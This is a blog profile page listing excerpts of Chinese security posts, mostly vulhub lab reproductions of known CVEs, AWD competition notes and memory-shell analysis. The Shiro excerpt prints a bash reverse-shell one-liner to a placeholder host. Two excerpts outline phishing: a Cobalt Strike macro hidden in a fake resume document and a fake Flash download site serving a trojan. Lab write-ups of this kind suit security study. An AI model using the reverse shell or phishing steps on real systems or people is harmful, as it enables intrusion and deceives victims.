自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(23)
  • 收藏
  • 关注

原创 内存马分析总结

文章目录TomcatTomcat环境搭建Servlet-API型Listener内存马Filter内存马Servlet内存马Valve内存马字节码增强型SpingSpring环境搭建拦截器Controller型TomcatTomcat环境搭建Servlet-API型Listener内存马Filter内存马Servlet内存马Valve内存马字节码增强型SpingSpring环境搭建拦截器Controller型......

2022-04-13 15:51:36 746

转载 vulhub-weblogic

Weblogic 管理控制台未授权远程命令执行漏洞(CVE-2020-14882,CVE-2020-14883)Weblogic是Oracle公司推出的J2EE应用服务器。在2020年10月的更新中,Oracle官方修复了两个长亭科技安全研究员@voidfyoo 提交的安全漏洞,分别是CVE-2020-14882和CVE-2020-14883。CVE-2020-14882允许未授权的用户绕过管理控制台的权限验证访问后台,CVE-2020-14883允许后台任意用户通过HTTP协议执行任意命令。使用这两个

2021-01-03 21:09:38 972

转载 vulhub-drupal

Drupal < 7.32 “Drupalgeddon” SQL注入漏洞(CVE-2014-3704)Drupal 是一款用量庞大的CMS,其7.0~7.31版本中存在一处无需认证的SQL漏洞。通过该漏洞,攻击者可以执行任意SQL语句,插入、修改管理员信息,甚至执行任意代码。漏洞环境执行如下命令启动Drupal 7.31环境:docker-compose up -d环境启动后,访问http://your-ip:8080即可看到Drupal的安装页面,使用默认配置安装即可。其中,Mysql

2021-01-01 18:06:28 631

转载 vulhub-ecshop

ECShop 2.x/3.x SQL注入/任意代码执行漏洞ECShop是一款B2C独立网店系统,适合企业及个人快速构建个性化网上商店。系统是基于PHP语言及MYSQL数据库构架开发的跨平台开源程序。其2017年及以前的版本中,存在一处SQL注入漏洞,通过该漏洞可注入恶意数据,最终导致任意代码执行漏洞。其3.6.0最新版已修复该漏洞,vulhub中使用其2.7.3最新版与3.6.0次新版进行漏洞复现。参考链接:https://paper.seebug.org/691/环境搭建执行如下命令启动e

2020-12-31 16:08:08 270

转载 vulhub-AppWeb(CVE-2018-8715)

AppWeb认证绕过漏洞(CVE-2018-8715)AppWeb是Embedthis Software LLC公司负责开发维护的一个基于GPL开源协议的嵌入式Web Server。他使用C/C++来编写,能够运行在几乎先进所有流行的操作系统上。当然他最主要的应用场景还是为嵌入式设备提供Web Application容器。AppWeb可以进行认证配置,其认证方式包括以下三种:basic 传统HTTP基础认证digest 改进版HTTP基础认证,认证成功后将使用Cookie来保存状态,而不用再传递A

2020-12-30 16:35:17 256

原创 office钓鱼学习

先建一个word,找到一张简历,将简历虚化,并另存为doc:在office中需要使用开发工具,需要自己开启:文件-更多-选项-自定义功能区-从下列选择命令-主选项卡-开发工具,将开发工具前面的复选框给选上选择 开发工具-图像控件将这个控件设置为 浮于文字上方,并将控件拉满文档点击这个控件,将属性设置为图片的名称先使用cs生成宏在auto_open()函数首部编写代码,设置图片的位置为0、高度为0,让宏运行后doc上图片消失,然后保存,office马就制作好了点击之后,c

2020-12-29 10:57:44 538

原创 xxs-flash-钓鱼

0x00 准备1、源码:https://github.com/r00tSe7en/Fake-flash.cn2、域名:一个和flash相近的域名和一台服务器3、木马:cobalstrike生成木马4、其他:flash安装包0x01 实际操作搭建环境第一步:下载源代码,直接在使用phpstudy搭建一个网站:第二步:启动cs,制作木马使用cs生成一个木马第三步:下载flash安装程序在这里插入图片描述...

2020-12-27 21:16:19 747

原创 vulhub-activemq

ActiveMQ 反序列化漏洞(CVE-2015-5254)Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java Message Service(JMS)ObjectMessage对象利用该漏洞执行任意代码。参考链接:https://

2020-12-25 11:10:01 279

原创 vulhub:Raven2

基本信息靶机靶机地址:Download: https://drive.google.com/open?id=1fXp4JS8ANOeClnK63LwgKXl56BqFJ23zDownload (Mirror): https://download.vulnhub.com/raven/Raven2.ovaDownload (Torrent): https://download.vulnhub.com/raven/Raven2.ova.torrent ( Magnet)靶机难度:中等靶机描述

2020-09-26 15:20:55 569 1

原创 漏洞复现-反序列化-apache shiro

0x00、原理说明0x01、环境搭建1、vulhub + docker2、访问ip0x02、漏洞利用制作反弹shellbash -i >& /dev/tcp/反弹IP/端口 0>&1然后在 http://www.jackson-t.ca/runtime-exec-payloads.html 上进行java反序列化绕过base64编码在监听机出监听反弹端口构造恶意cookiesimport osimport sysimport timeimpor

2020-09-26 15:19:10 262

原创 vulhub:sunrise

0x00 基本信息1、靶机下载地址:Download: https://mega.nz/#!IKQQ2SxZ!anBsBnlQrYh2ELYWYa1mHYKG_7kRw402zfo2WOOB8Z0Download (Mirror): https://download.vulnhub.com/sunset/sunrise.7zDownload (Torrent): https://download.vulnhub.com/sunset/sunrise.7z.torrent ( Magnet)

2020-09-26 15:17:26 348

原创 vulhub:EVM

这里写目录标题基本信息靶机工具、知识点:0x00、信息收集0x01、漏洞利用0x02、提取基本信息靶机地址:难度:中等工具、知识点:nmapwpscanmsfpython 0x00、信息收集通过扫描网段,找到靶机的地址:找到靶机地址 192.168.56.103,通过 -p- 进行全端口扫描:通过nmap脚本对端口进行扫描:map -A -T4 -p 22,53,80,110,139,143,445 --script=vuln -v 192.168.56.103PORT

2020-09-26 15:17:00 371

原创 AWD:web_yunnan_2

0x00 环境搭建参考:team1:ctf:9a0b71fdda36c36506645794a4927e45team2:ctf:4c79b2c32f29aec11a0545d440f5204b0x01 漏洞&修复后门漏洞证明1、先登录ssh,然后现在自己服务器里面的文件,在通过D盾来扫描,查看是不是有什么后门,尽快排除后门:从D盾上查看到2个地方可能存在后门,然后找到对应的文件,查看代码,发现 /includes/config.php中是一个后门:<?php echo 'h

2020-09-24 15:30:24 923 1

原创 vulhub:Tr0ll3

0x00 基本信息下载Please remember that VulnHub is a free community resource so we are unable to check the machines that are provided to us. Before you download, please read our FAQs sections dealing with the dangers of running unknown VMs and our suggestions fo

2020-09-20 01:18:51 267

原创 漏洞复现-反序列化-weblogic(CVE-2018-2628)

0x00 原理说明1、了解什么是T3、RMI、JRMP?2、了解什么是ysoserial.jar,以及如何使用?0x01 环境搭建搭建环境搭建:docker + vulhub搭建效果:物理机:192.168.0.105kali:192.168.233.129:7001工具1、nmap2、ysoserial.jar3、漏洞扫描脚本:https://github.com/rabbitmask/WeblogicScan3、利用脚本:https://www.exploit-db.com/

2020-09-14 16:05:46 708

原创 vulhub:Tr0ll-1

0x00 基本信息下载地址:Download: http://overflowsecurity.com/files/Tr0ll.rarDownload (Mirror): https://download.vulnhub.com/tr0ll/Tr0ll.rarDownload (Torrent): https://download.vulnhub.com/tr0ll/Tr0ll.rar.torrent ( Magnet)描述:Tr0ll was inspired by the constan

2020-09-12 16:29:05 400

原创 vulhub:Os-hackNos 3

0x00基本信息靶机下载地址:Download: https://drive.google.com/open?id=1zWTU6BFXPmS8BDeoVc766FwUJQZ4-_RTDownload (Mirror): https://download.vulnhub.com/hacknos/Os-hackNos-3.ovaDownload (Torrent): https://download.vulnhub.com/hacknos/Os-hackNos-3.ova.torrent ( Mag

2020-08-30 13:46:20 248

原创 AWD:web_yunnan_1

0x00 环境搭建1、进入 cd awd-platform-master2、创建赛题和队伍数量:3、启动4、查看SSH密码5、查看到队伍映射的端口6、访问端口:7、同样可以使用ssh账户登录自己的服务器,下载对应的源文件0x01 漏洞&修复任意文件下载漏洞挖掘1、扫描目录:扫描了一下目录,没有发现有价值的东西,查看了一下源码发现后台目录2、登录该目录:3、直接使用弱口令,admin/admin即可登录4、在日志下载处,发现可以下载log,使用bp和wir

2020-08-27 15:48:02 1305

原创 AWD:搭建

1、下载地址:git clone https://github.com/zhl2008/awd-platform.git2、进入项目:cd awd-platform3、通过docker下载镜像:docker pull zhl2008/web_14.044、修改镜像名字(或者改代码):docker tag zhl2008/web_14.04 web_14.045、创建赛题及队伍数量:python batch.py web_yunnan_simple 2web_yunnan_simple 为赛题;2

2020-08-25 22:17:22 518

原创 vulhub:Os-hackNos 2.1

0x00 基本信息靶机描述Difficulty : Easy to IntermediateFlag : 2 Flag first user And second rootLearning : Web Application | Enumeration | Password Cracking靶机下载Download: https://drive.google.com/open?id=1Uszfqoomm7iv_c4aiuNb6UPl8Zgfv58sDownload (Mirror): http

2020-08-23 12:12:20 198

原创 vulhub:Os-hackNos

0X00 基本信息描述Difficulty : Easy to IntermediateFlag : 2 Flag first user And second rootLearning : exploit | Web Application | Enumeration | Privilege EscalationWebsite : www.hackNos.commail : contact@hackNos.com下载地址Os-hackNos-1.ova (Size: 827 MB)Down

2020-08-22 22:29:18 171

原创 漏洞复现-反序列化-fastjson

0x00、原理说明0x01、环境搭建1、docker + vulhub2、fastjson 1.2.24-rce3、物理机:192.168.10.108 靶机:192.168.10.1304、访问效果0x02、漏洞利用漏洞扫描特征使用nmap扫描靶机,识别到opsmessaging:利用dnslog漏洞验证漏洞1、使用dnslog进行无回显测试:http://www.dnslog.cn/2、准备pocimport java.lang.Runtime;import ja

2020-08-17 15:27:58 3972 1

原创 vulhub:WTF

基本信息靶机靶机地址:难度:描述:知识点、工具nmap0x00、信息收集通过扫描网段,找到靶机的地址:通过nmap扫描IP端口:0x01、漏洞利用0x02、权限提升

2020-07-23 17:14:28 603

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除